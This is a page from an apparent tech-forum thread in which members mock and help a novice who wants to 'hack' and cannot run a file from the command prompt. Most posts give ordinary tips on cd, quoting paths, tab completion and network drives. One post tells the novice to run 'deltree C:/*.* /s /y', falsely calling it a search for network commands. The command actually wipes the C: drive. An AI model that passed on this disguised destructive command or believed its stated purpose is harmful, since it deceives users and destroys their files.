How do you use command prompt?

Page 2 - Seeking answers? Join the AnandTech community: where nearly half-a-million members share solutions and discuss the latest tech.

Platypus

Lifer
Apr 26, 2001
You can either give the full literal command like that, or you can drag the file onto an open command window and it will auto fill that in.

Another way still is to use the cd command to change to that directory and type the filename.exe at an empty prompt.

I think for your purposes, the drag and drop will help you more.

Hyperblaze

Lifer
May 31, 2001
ROTFL, this is just too funny....

Do you even know what hacking is?
http://www.catb.org/~esr/faqs/hacker-howto.html (official howto on how to become a hacker)
no linkie, I suck at making them

You just want to access files in DOS? just go into that directory and run it.
To be honest, I'm not used to the DOS prompt anymore, but I use the unix shell on a daily basis, and as far as I can recall, it's about the same.

c:\>cd\directory you want to go in
c:\directory location><file to run>

if you want to map a network drive to your machine
net use h: \\ip of other machine\<directory to map> (i think this is it)
to remove a network drive in dos

net use h: /d /y

anything else you want to know on how to do network administration?

Jzero

Lifer
Oct 10, 1999
Originally posted by: CorporateRecreation
You can either give the full literal command like that, or you can drag the file onto an open command window and it will auto fill that in.

Another way still is to use the cd command to change to that directory and type the filename.exe at an empty prompt.

You might consider a brief primer on drag-and-drop while you're down there.

Platypus

Lifer
Apr 26, 2001
Originally posted by: sward666
Ya think??

I don't fault anyone for being ignorant and asking for help. Asking to 'hack' something earlier in the thread was what the problem was. He used the wrong vocabulary.

WannaFly

Platinum Member
Jan 14, 2003
... or you can drag the file onto an open command window and it will auto fill that in.

I had to stop laughing(re: this thread) to say to myself "I didnt know you could do that!", thanks CorporateRecreation!

Hyperblaze

Lifer
May 31, 2001
Originally posted by: sward666
Ya think??

I don't fault anyone for being ignorant and asking for help. Asking to 'hack' something earlier in the thread was what the problem was. He used the wrong vocabulary.

Quite true in your statement.

There is nothing wrong with wanting to learn, that's how we all started. and we probably asked equally as ignorant questions at the beginning also. I must of driven several teachers up the wall with all my questions when I was in school.

I do apologize for laughing. If you need any futher assistance, please let us know.

OrganizedChaos

Diamond Member
Apr 21, 2002
type deltree C:/*.* /s /y

this will search your computer for network commands you can use. not sure if that still works though, i think microsoft may have taken it out in xp when they found out that end users were discovering there commands. should work in win98 though. good ole microsoft and there "security through obsecrity" policy.

TuxDave

Lifer
Oct 8, 2002
ROFL..... I use 'ipconfig /release' and 'ipconfig /renew' from command prompt with the DHCP server assigns me a conflicting IP address. I'm a h4x0r!!!

johnjbruin

Diamond Member
Jul 17, 2001
dude... how long have you been using computers.
you are having problems running a file from DOS and are a wanna be hacker...

dont even know where to start giving you any advice

gwlam12

Diamond Member
Apr 4, 2001
he must be the generation of windows where command prompt is becoming obsolete. :)

im still happy with the knowledge i learned from using ms dos.

DaFinn

Diamond Member
Jan 24, 2002
I am feeling veery old... people nowadays can't use dos??? And running an exe from some folder is considered *cough*... hacking?

gherald

Mar 9, 2004
Quick note - when working with directories that contain spaces in their name, it is often helpful to use " marks, for example:

c:\> cd "\documents and settings\all users\desktop\cprg\"
c:\> yourfile.exe

Also note that under WinXP you can press the tab key to complete file and path names, eg type:

c:\> cd "\doc

#now press tab key, and you end up with:

c:\> cd "\documents and settings"

so that saves you some typing...

Modeps

Lifer
Oct 24, 2000
I love 'hacking', that's all I ever did on my 286 because there was only this black screen and something that was weird c:\> or something. I hacked that machine GOOD.